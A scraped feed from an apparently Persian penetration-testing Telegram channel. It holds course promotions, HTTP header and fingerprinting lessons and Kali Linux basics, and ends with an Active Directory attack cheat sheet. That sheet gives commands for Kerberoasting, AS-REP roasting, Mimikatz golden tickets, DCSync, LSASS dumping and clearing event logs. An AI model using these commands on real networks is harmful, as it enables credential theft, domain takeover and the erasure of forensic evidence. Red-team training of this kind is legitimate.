Try Hack Box
4.88K subscribers
572 photos
63 videos
79 files
601 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
Account_Takeover_Vulnerability_Affecting_Over_400K_Installations.pdf
444.5 KB
🔖 آسیب پذیری تصاحب حساب (Account Takeover) که بیش از ۴۰۰ هزار نصب را تحت تأثیر قرار داده بود، در افزونه Post SMTP برطرف شد.

افزونه Post SMTP که بیش از ۴۰۰ هزار نصب دارد، یک افزونه ارسال ایمیل برای وردپرس است. این افزونه به مدیران سایت اجازه میدهد سرویس های ایمیل سفارشی را تنظیم کنند و ابزارهایی مثل لاگ برداری ایمیل، اعتبارسنجی DNS و پشتیبانی از OAuth را برای راحت تر کردن ارسال ایمیل در وردپرس ارائه میدهد. توسعه دهنده این افزونه از تیم WPExperts است.
@TryHackBox
👍5🔥4
🔖 TryHackMe Course - Pre Security | قسمت 00

💢 قسمت ۰۰ – معرفی دوره TryHackMe

🔴 درود به همه علاقه‌مندان امنیت سایبری!
در این مسیر آموزشی، ما قدم به قدم با استفاده از محتوای رسمی سایت TryHackMe پیش می‌رویم؛ یک پلتفرم آموزشی معتبر و بسیار کاربردی در حوزه هک اخلاقی و امنیت سایبری.
تمام مفاهیم و چالش‌هایی که در این دوره می‌بینید دقیقاً مطابق با آنچه در سایت TryHackMe ارائه شده است، طراحی شده‌اند.
هدف ما این است که با تمرین و آموزش عملی روی محیط‌های واقعی و چالش‌های کاربردی، مهارت‌های شما را در زمینه امنیت سایبری به شکل چشمگیری ارتقا دهیم.
پس اگر آماده‌اید، همراه ما باشید تا این مسیر جذاب را با هم طی کنیم و قدم در دنیای حرفه‌ای امنیت سایبری بگذاریم!

📌 برای دیدن ویدئو روی لینک زیر کلیک کنید :

🧩
https://youtu.be/jvSC8GJ3MWQ?si=0EE3mKY4CQtXlSEF


🆔
@TryHackBox
14
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :

💠 کانال های تلگرام ما

🔶 آموزش تست نفوذ و Red Team
🆔
@TryHackBox

🔶 رودمپ های مختلف
🆔
@TryHackBoxOfficial

🔶 داستان های هک
🆔
@TryHackBoxStory

🔶 آموزش برنامه نویسی
🆔
@TryCodeBox

🔶 رادیو زیروپاد ( پادکست ها )
🆔
@RadioZeroPod

🔶  کانال PFKSecurity از جمله پوشش APT , CVE , Exploit و موارد دیگر :

🆔
@PfkSecurity

👥 گروه های پرسش و پاسخ

🔷 هک و امنیت
🆔
@TryHackBoxGroup
🔷 برنامه نویسی
🆔
@TryCodeBoxGroup


🔴 اینستاگرام :
🔗
http://www.instagram.com/TryHackBox

🔵 یوتیوب :
🔗
https://youtube.com/@tryhackbox

🟠 گیت هاب ما :
🔗
https://github.com/TryHackBox/
5
Forwarded from P.F.K Security
https://aadapt.mitre.org/

MITRE AADAPT
(اقدامات مخرب در فناوری های پرداخت دارایی دیجیتال) یک پایگاه دانش جامع است که تاکتیک ها و تکنیک های مهاجمان علیه سامانه های مدیریت دارایی دیجیتال را بر اساس حملات واقعی، مشاهدات و آسیب پذیری ها مستند میکند. 
ساختار AADAPT مشابه فریم ورک معروف MITRE ATT&CK طراحی شده و تاکتیک ها و تکنیک هایش مکمل ATT&CK هستند.

در ماتریس AADAPT، هر ستون نمایانگر یک تاکتیک حمله است و تکنیک های مرتبط با دارایی دیجیتال زیر هر تاکتیک قرار دارند. مواردی که با نماد & مشخص شده اند، تکنیک ها یا زیرتکنیک های ATT&CK هستند که در زمینه دارایی دیجیتال نیز کاربرد دارند و جزئیات این ارتباط در ضمیمه های AADAPT توضیح داده شده است. با کلیک روی هر مورد، میتوانید توضیحات بیشتری بخوانید یا از طریق نوار بالا، تاکتیک ها و تکنیک های AADAPT را مرور کنید.

@PfkSecurity
5
🚀 پارت 0 (A)
شناسایی کلاینت‌ها و کوکی‌ها (Client Identification and Cookies)

در دنیای وب، سرورها ممکن است همزمان با هزاران کلاینت مختلف در تعامل باشند. اما چطور یک سرور می‌تواند تشخیص دهد که درخواست دریافتی از سوی چه کسی بوده یا به کدام کاربر تعلق دارد؟ به طور پیش‌فرض، پروتکل HTTP stateless (بی‌حالت) است، یعنی هر درخواست، مستقل از درخواست‌های قبلی در نظر گرفته می‌شود.

برای حل این چالش، سرورها نیاز دارند بتوانند هویت کاربران را تشخیص داده و پیگیری کنند. این شناسایی امکان‌پذیر نیست مگر با استفاده از یک‌سری تکنیک‌ها و فناوری‌هایی که به کمک آن‌ها، هر کاربر یا کلاینت به صورت یکتا قابل ردیابی خواهد بود.

در این سری، به بررسی روش‌هایی می‌پردازیم که سرورها از آن‌ها برای شناسایی کاربران بهره می‌برند. این روش‌ها هم در معماری شبکه اهمیت دارند و هم در امنیت وب، زیرا بسیاری از حملات و مکانیزم‌های دفاعی (مثل تشخیص نشست‌های غیرمجاز، پیگیری رفتار مشکوک و جلوگیری از جعل هویت) به همین مکانیزم‌های شناسایی وابسته‌اند.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity
👍6🔥1
🚀 پارت 0 (B)
بررسی The Personal Touch در وب مدرن

پروتکل HTTP ذاتاً یک پروتکل stateless یا بدون‌حالت است؛ یعنی سرور هیچ‌گونه اطلاعاتی از درخواست‌های قبلی کلاینت نگه نمی‌دارد. هر بار که مرورگر شما درخواستی به سرور ارسال می‌کند، سرور آن را به‌صورت مستقل پردازش کرده و پاسخ می‌دهد، بدون اینکه "بداند" چه کسی درخواست را فرستاده است.

اما این رفتار، برای سرویس‌های امروزی وب قابل‌قبول نیست. اکثر وب‌سایت‌های مدرن می‌خواهند تجربه‌ای شخصی‌سازی‌شده به کاربران ارائه دهند؛ چیزی که به آن The Personal Touch می‌گوییم. این یعنی سایت باید بداند شما کی هستید، سابقه‌ تعامل شما چیست، و بتواند شما را در جریان بازدیدهای بعدی شناسایی کند.

برخی کاربردهای مهم Personal Touch:

خوش‌آمدگویی شخصی: نمایش نام کاربر یا محتوای مخصوص او
🎯 پیشنهادهای هدفمند: ارائه محصول یا محتوا بر اساس رفتار قبلی شما
🧾 اطلاعات ذخیره‌شده: عدم نیاز به وارد کردن مکرر اطلاعات (مانند آدرس یا کارت بانکی)
🛒 ردیابی سشن: نگه‌داشتن وضعیت سبد خرید یا فرم‌های چندمرحله‌ای

📎 اما چطور این کار را در HTTP بدون‌حالت انجام می‌دهند؟

برای رسیدن به این هدف، تکنیک‌ها و فناوری‌های مختلفی ابداع شده‌اند که به سرورها اجازه می‌دهند هویت کاربران را شناسایی و پیگیری کنند. برخی از این تکنیک‌ها:

🔹Headerهای HTTP:
شامل اطلاعاتی مانند User-Agent، زبان، نوع مرورگر و…
🔹IP Address:
استفاده از آدرس IP برای شناسایی تقریبی کاربران
🔹Authentication:
شناسایی کاربران با ورود (Login) و احراز هویت
🔹Fat URLs:
قرار دادن اطلاعات شناسایی در آدرس‌ها (نه چندان ایمن!)
🔹Cookies:
یکی از مهم‌ترین روش‌ها برای نگه‌داری وضعیت (State) کاربر

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity
👍41
🔐 آنچه مردم از امنیت سایبری تصور می‌کنند:
👨‍💻 شکار کردن هدف و نوشیدن قهوه ☕️
📊 آنچه واقعاً هست:
جلسات، ریست رمزها، باز کردن اکانت‌ها، مستندسازی، پچ کردن، مدیریت تامین‌کننده‌ها، پاسخ به رخدادها و...

🎯 امنیت سایبری فقط شکار کردن هدف نیست، بلکه دنیایی از وظایف روتین، تیم‌محور و پیشگیرانه است.

✍️نویسنده
@TryHackBox | The Chaos
🔥3
مقدمه: تست نفوذ چیست؟
تست نفوذ یک چرخه مداوم از تحقیق و حمله علیه یک هدف یا مرز است. این حمله باید به صورت ساختاریافته، محاسبه‌شده و در صورت امکان، در یک محیط آزمایشگاهی تأیید شود، قبل از اینکه بر روی یک هدف واقعی اجرا گردد. ما فرآیند یک تست نفوذ را به این صورت نشان می‌دهیم:

همانطور که مدل نشان می‌دهد، هرچه اطلاعات بیشتری جمع‌آوری کنید، احتمال موفقیت نفوذ بالاتر می‌رود. پس از اینکه از مرز اولیه هدف عبور کردید، معمولاً چرخه را دوباره از سر می‌گیرید. به عنوان مثال، ممکن است اطلاعاتی درباره شبکه داخلی جمع‌آوری کنید تا به صورت عمیق‌تر در آن نفوذ کنید.

✍️نویسنده
@TryHackBox| احسان آخوندی

#pwk #CyberSecurity
👍72
مقدمه: آشنایی با کالی لینوکس: قسمت اول
در ابتدا که لینوکس را نصب کرده اید، هم نام کاربری و هم رمز عبور اولیه شما kali است:
Username: kali
Password: kali

ماشین مجازی کالی لینوکس شامل دو کاربر پیش‌فرض به نام‌های "root" و "kali" خواهد بود. ما از حساب کاربری "kali" استفاده خواهیم کرد. هرچند ممکن است وسوسه‌انگیز باشد که با کاربر "root" وارد شوید، اما این کار توصیه نمی‌شود. کاربر "root" دسترسی نامحدود دارد و یک فرمان اشتباه می‌تواند به سیستم ما آسیب برساند. بدتر از آن، اگر یک مهاجم بتواند از یک فرآیند در حال اجرا با دسترسی "root" سوءاستفاده کند، کنترل کامل ماشین ما را به دست خواهد گرفت.

بسیاری از دستورات برای اجرا به دسترسی‌های سطح بالا نیاز دارند؛ خوشبختانه، دستور sudo می‌تواند این مشکل را حل کند. ما عبارت sudo را قبل از دستوری که می‌خواهیم اجرا کنیم وارد کرده و در صورت درخواست، رمز عبور خود را وارد میکنیم.

پیشنهاد می‌شود که همان اول رمز عبور خود را در ترمینال با کامند passwd تغییر دهید:

✍️نویسنده
@TryHackBox| احسان آخوندی

#pwk #CyberSecurity
👍7🔥1
🚀 پارت 1 (A)
بررسی HTTP Headers و شناسایی کاربران

در HTTP، هدرهای درخواست (Request Headers) اطلاعاتی درباره کاربر، مرورگر، مسیر ورود و تنظیمات کلاینت ارائه می‌دهند. برخی از این هدرها به سرور کمک می‌کنند تا کاربر را شناسایی یا ردیابی کند؛ حتی زمانی که ورود (Login) انجام نشده باشد.

در این پست، به بررسی ۷ هدر پرکاربرد در شناسایی کلاینت‌ها می‌پردازیم:

1️⃣ From
این هدر شامل آدرس ایمیل کاربر است و در گذشته به عنوان راهی برای شناسایی کاربران در نظر گرفته می‌شد.
🔴 اما امروز، مرورگرها معمولاً این هدر را ارسال نمی‌کنند چون می‌تواند منجر به سوءاستفاده‌هایی مانند اسپم یا فیشینگ شود.
🛑 در عمل، From یک هدر تقریباً منسوخ و ناامن محسوب می‌شود.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity
🔥4
🚀 پارت 1 (B)
بررسی HTTP Headers و شناسایی کاربران

2️⃣ User-Agent

شامل اطلاعات دقیق درباره مرورگر، نسخه آن، سیستم‌عامل و گاهی معماری سیستم است.
مثال:

Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36


🔍 کاربرد امنیتی: ترکیب این اطلاعات می‌تواند در ساخت یک پروفایل نسبی از کلاینت استفاده شود. اگر ترکیب User-Agent خاصی فقط توسط یک کاربر استفاده شود، سرور می‌تواند آن را شناسایی کند.

3️⃣ Referer

مشخص می‌کند که کاربر از کدام صفحه یا سایت به این صفحه فعلی رسیده است.

کاربردها:

* تحلیل رفتار کاربران
* ردگیری مسیر بازدید (Path Tracking)
* شناسایی منابع ترافیک (مثلاً از Google آمده یا از یک سایت تبلیغاتی)

⚠️ از منظر امنیتی، این هدر می‌تواند اطلاعات حساس (مانند توکن‌ها در URL) را نیز فاش کند، به همین دلیل در بسیاری از برنامه‌های امن، مقدار آن کنترل یا حذف می‌شود.

4️⃣ Accept-Language

مشخص می‌کند زبان‌های ترجیحی کاربر چیست. برای مثال:

Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en;q=0.7


🌐 کاربردها:

* نمایش خودکار سایت به زبان مناسب
* شناسایی منطقه جغرافیایی کاربر

🎯 در کنار IP و User-Agent می‌تواند بخشی از پروفایل شناسایی کاربر را شکل دهد.

5️⃣ Accept

این هدر مشخص می‌کند که کلاینت چه نوع محتواهایی را پشتیبانی می‌کند (مثلاً HTML، JSON یا XML).
نمونه:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8


🧩 اگرچه نقش مستقیمی در شناسایی ندارد، ولی ترکیب خاص مقادیر این هدر می‌تواند به‌صورت غیرمستقیم در Fingerprinting کاربر مفید باشد.

6️⃣ Accept-Encoding

بیان می‌کند که چه الگوریتم‌های فشرده‌سازی (مثل gzip یا br) توسط کلاینت پشتیبانی می‌شوند.

🛡 اگرچه هدف اصلی آن کاهش حجم پاسخ است، اما باز هم می‌تواند بخشی از اثر انگشت مرورگر (Browser Fingerprint) را بسازد.

7️⃣ DNT (Do Not Track)

این هدر اعلام می‌کند که آیا کاربر می‌خواهد ردیابی نشود (Do Not Track).
مقدار آن معمولاً 1 برای فعال‌بودن یا 0 برای غیرفعال‌بودن است.

🚫 این هدر غیرالزامی و داوطلبانه است، و بسیاری از سرورها آن را نادیده می‌گیرند.

📌 جمع‌بندی:
درست است که هیچ‌کدام از این هدرها به‌تنهایی برای شناسایی دقیق کافی نیستند، اما ترکیب آن‌ها می‌تواند به ساخت اثر انگشت دیجیتال (Fingerprint) کمک کند. این روش‌ها پایه بسیاری از سامانه‌های تشخیص تقلب، تبلیغات هدفمند، یا حتی حملات مبتنی بر شناسایی مرورگر هستند.

✍️نویسنده
@TryHackBox | The Chaos

#HTTP #Cookies #CyberSecurity
9🔥1🙏1
مقدمه: آشنایی با کالی لینوکس: قسمت دوم

کالی لینوکس از استاندارد سلسله‌مراتب سیستم فایل (FHS) پیروی می‌کند که یک ساختار آشنا و جهانی برای تمام کاربران لینوکس فراهم می‌آورد. دایرکتوری‌هایی که بیشتر به کار شما خواهند آمد عبارتند از:

/bin - برنامه‌های پایه (مانند ls, cd, cat و غیره)
/sbin - برنامه‌های سیستمی (مانند fdisk, mkfs, sysctl و غیره)
/etc - فایل‌های پیکربندی
/tmp - فایل‌های موقت (که معمولاً هنگام راه‌اندازی مجدد، حذف می‌شوند)
/usr/bin - برنامه‌ها (مانند apt, ncat, nmap و غیره)
/usr/share - فایل‌های پشتیبانی برنامه و داده‌ها

دایرکتوری‌های دیگری نیز وجود دارند که به ندرت نیاز به ورود به آن‌ها خواهید داشت، اما آشنایی خوب با ساختار سیستم فایل لینوکس، به شدت به کارایی شما کمک خواهد کرد.

✍️نویسنده
@TryHackBox| احسان آخوندی

#pwk #CyberSecurity
👍62
XXE Cheat Sheet (2025 Update)
✍️نویسنده
@TryHackBox | The Chaos
🔥4
XXE Cheat Sheet (2025 Update).pdf
626.8 KB
✏️ مقاله تالیف شده
XXE Cheat Sheet (2025 Update)


✍️نویسنده
@TryHackBox | The Chaos

#XEE #CheatSheet #CyberSecurity
👍4🔥4
مقدمه:آشنایی با کالی لینوکس: قسمت سوم: basic linux commands

1. man pages

دستور man (مخفف Manual) به شما این امکان را می‌دهد که مستندات و راهنماهای مربوط به دستورات لینوکس را مشاهده کنید. هر دستور در لینوکس، مستندات یا "صفحات راهنما" دارد که توضیحاتی در مورد نحوه استفاده از آن دستور، آپشن‌ها، و پارامترهای مختلف را ارائه می‌دهند.
استفاده:


   man <command>


به‌عنوان مثال:


   man ls


این دستور مستندات مربوط به دستور ls (که برای لیست کردن محتویات دایرکتوری استفاده می‌شود) را نمایش می‌دهد.

2. apropos

دستور apropos به شما این امکان را می‌دهد که به‌دنبال یک عبارت یا کلمه کلیدی در صفحات راهنمای لینوکس بگردید. این دستور به‌ویژه زمانی مفید است که شما بخواهید از دستورات موجود در سیستم برای انجام یک کار خاص آگاه شوید، اما دقیقا نمی‌دانید که چه دستوری برای انجام آن کار وجود دارد.
استفاده:


   apropos <keyword>


به‌عنوان مثال:


   apropos network


این دستور تمام دستورات و ابزارهایی که مرتبط با شبکه هستند را نمایش می‌دهد.

3. listing files & options

دستور ls برای لیست کردن فایل‌ها و دایرکتوری‌ها در یک دایرکتوری استفاده می‌شود. این دستور می‌تواند با آپشن‌های مختلف برای نمایش اطلاعات بیشتر مانند جزئیات فایل‌ها، ترتیب خاص و فیلترهای مختلف تنظیم شود.
آپشن‌ها:

* -l: نمایش اطلاعات به‌صورت لیست (جزئیات فایل‌ها مانند مجوزها، سایز، تاریخ و غیره).
* -a: نمایش فایل‌های مخفی (فایل‌هایی که نام آن‌ها با نقطه شروع می‌شود).
* -h: نمایش اندازه فایل‌ها به‌صورت خوانا (مثلاً 1K, 234M).
* -R: نمایش محتویات دایرکتوری‌ها به‌صورت بازگشتی.
استفاده:


   ls -la


این دستور لیست تمام فایل‌ها و دایرکتوری‌ها را به‌همراه جزئیات نشان می‌دهد، حتی فایل‌های مخفی.

4. cd

دستور cd (مخفف "change directory") برای تغییر دایرکتوری فعلی در سیستم فایل استفاده می‌شود. با استفاده از این دستور می‌توانید به دایرکتوری‌های مختلف جابه‌جا شوید.
استفاده:


   cd <directory_path>


به‌عنوان مثال:


   cd /home/user/Documents


این دستور شما را به دایرکتوری Documents در مسیر /home/user/ منتقل می‌کند.
نکات:

* اگر دستور cd بدون آرگومان اجرا شود، به دایرکتوری خانگی (home) شما منتقل می‌شود.
* استفاده از cd .. شما را به دایرکتوری بالاتر (والد) می‌برد.

5. pwd

شرح: دستور pwd (مخفف "print working directory") برای نمایش مسیر دایرکتوری فعلی که در آن قرار دارید، استفاده می‌شود. این دستور مسیر کامل دایرکتوری جاری را نمایش می‌دهد.
استفاده:


   pwd


این دستور مسیر دایرکتوری فعلی را نمایش می‌دهد، به‌عنوان مثال:


   /home/user/Documents


6. mkdir

دستور mkdir برای ایجاد دایرکتوری‌های جدید در سیستم استفاده می‌شود.



   mkdir <directory_name>


به‌عنوان مثال:


   mkdir new_folder


این دستور یک دایرکتوری به نام new_folder در دایرکتوری فعلی ایجاد می‌کند.
آپشن‌ها:

* -p: این آپشن به شما اجازه می‌دهد که چندین دایرکتوری را به صورت همزمان و به صورت سلسله‌مراتبی بسازید. اگر دایرکتوری پدر وجود نداشته باشد، آن‌را نیز ایجاد می‌کند.


   mkdir -p /home/user/new_folder/sub_folder


این دستور دایرکتوری new_folder و سپس sub_folder را در داخل آن ایجاد می‌کند.

جمع‌بندی:

این دستورات جزو دستورات پایه‌ای و مهم در لینوکس هستند که برای مدیریت دایرکتوری‌ها، فایل‌ها، و جستجو در مستندات سیستم استفاده می‌شوند. برای کار با Kali Linux و انجام تست‌های نفوذ، این دستورات بسیار مهم هستند و اغلب در فرآیندهای مختلف استفاده می‌شوند.

✍️نویسنده
@TryHackBox| احسان آخوندی

#pwk #CyberSecurity
4👍32
Active Directory attack Cheat sheet


(جمع‌آوری اطلاعات)

استفاده از ابزارهای:

BloodHound + SharpHound برای تحلیل گرافی

PowerView برای Enumeration:

Get-NetUser برای لیست کاربران

Get-NetGroup برای لیست گروه‌ها

Get-NetComputer برای لیست کامپیوترها


AdFind.exe:

مثال: AdFind.exe -f "(objectcategory=person)"


ldapsearch روی لینوکس یا Kali

چک کردن Trust بین دامنه‌ها (Get-NetDomainTrust)


🚪 مرحله ۲: Initial Access (دسترسی اولیه)

فیشینگ، فایل مخرب، دسترسی از طریق آسیب‌پذیری‌ها

اکسپلویت‌هایی مثل:

Zerologon (CVE-2020-1472)

PetitPotam برای NTLM Relay


حمله به سرویس‌های داخلی:

SMB Signing Disabled → Relay Attacks

NTLM Authentication Abuse

استفاده از Impacket برای اجرای ntlmrelayx.py

@TryHackBox | arian momeni
👍6
How AI Impacts Cloud Security.pdf
7.6 MB
#AI #Cloud_Security
🔖 هوش مصنوعی و امنیت کلاد

رشد ناگهانی ابزارهای هوش مصنوعی پیشرفته (GenAI) در سال گذشته باعث شده هوش مصنوعی به مرکز توجه صنعت فناوری و افکار عمومی تبدیل شود. فناوری هوش مصنوعی نقشی مهم در بخش فناوری داشته، به ویژه در حوزه امنیت کلاد یا ابری. بازار امنیت کلاد به سرعت در حال رشد است و قابلیت های هوش مصنوعی حالا عامل تعیین کننده ای هنگام انتخاب راه حل امنیت کلاد توسط شرکت ها محسوب میشود.

@TryHackBox | Group | Github | YouTube
🔥5
Try Hack Box
Active Directory attack Cheat sheet (جمع‌آوری اطلاعات) استفاده از ابزارهای: BloodHound + SharpHound برای تحلیل گرافی PowerView برای Enumeration: Get-NetUser برای لیست کاربران Get-NetGroup برای لیست گروه‌ها Get-NetComputer برای لیست کامپیوترها AdFind.exe:…
🧨 مرحله ۳: Privilege Escalation (ارتقاء دسترسی)

Kerberoasting:

گرفتن TGS Hash:

GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt

کرک با hashcat:

hashcat -m 13100 hashes.txt rockyou.txt


AS-REP Roasting:

اگر کاربر نیاز به pre-auth نداشته باشه:

GetNPUsers.py domain/ -usersfile users.txt -format hashcat


Unconstrained Delegation یا Privilege Misconfigurations

ACL Abuse با PowerView → پیدا کردن کاربرهایی که روی objectهای مهم کنترل دارند

@TryHackBox | arian momeni
51
Try Hack Box
🧨 مرحله ۳: Privilege Escalation (ارتقاء دسترسی) Kerberoasting: گرفتن TGS Hash: GetUserSPNs.py domain/user:pass@dc-ip -outputfile hashes.txt کرک با hashcat: hashcat -m 13100 hashes.txt rockyou.txt AS-REP Roasting: اگر کاربر نیاز به pre-auth نداشته باشه:…
🧬 مرحله ۴: Persistence (پایداری)

Golden Ticket:

ساختن با Mimikatz:

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-... /krbtgt:<hash>


Skeleton Key (موقعی که به DC دسترسی داریم)

SIDHistory Injection

Abuse کردن AdminSDHolder یا GPO برای حفظ دسترسی



🔁 مرحله ۵: Lateral Movement (حرکت جانبی)

تکنیک‌های کلیدی:

Pass-the-Hash

Pass-the-Ticket

Overpass-the-Hash

استفاده از WMI / PsExec / WinRM برای اجرای ریموت

ابزارهای:

wmiexec.py

PsExec.exe

CrackMapExec (لینوکس)

SharpExec.exe یا PowerShell Remoting






🏰 مرحله ۶: Domain Controller Compromise

DCSync Attack با Mimikatz:

lsadump::dcsync /domain:domain.local /user:krbtgt

DCShadow Attack

Dump LSASS با Procdump:

procdump -ma lsass.exe lsass.dmp

و استخراج رمزها با Mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords




🪖مرحله ۷: Exfiltration & Cleanup

Exfiltration با SMB، DNS Tunneling یا ابزارهایی مثل Rclone

حذف لاگ:

wevtutil cl Security
del *.evtx

پوشاندن ردپاها با ابزارهای پاک‌سازی (مثلاً Invoke-Phant0m.ps1)


نویسنده
@TryHackBox | arian momeni
7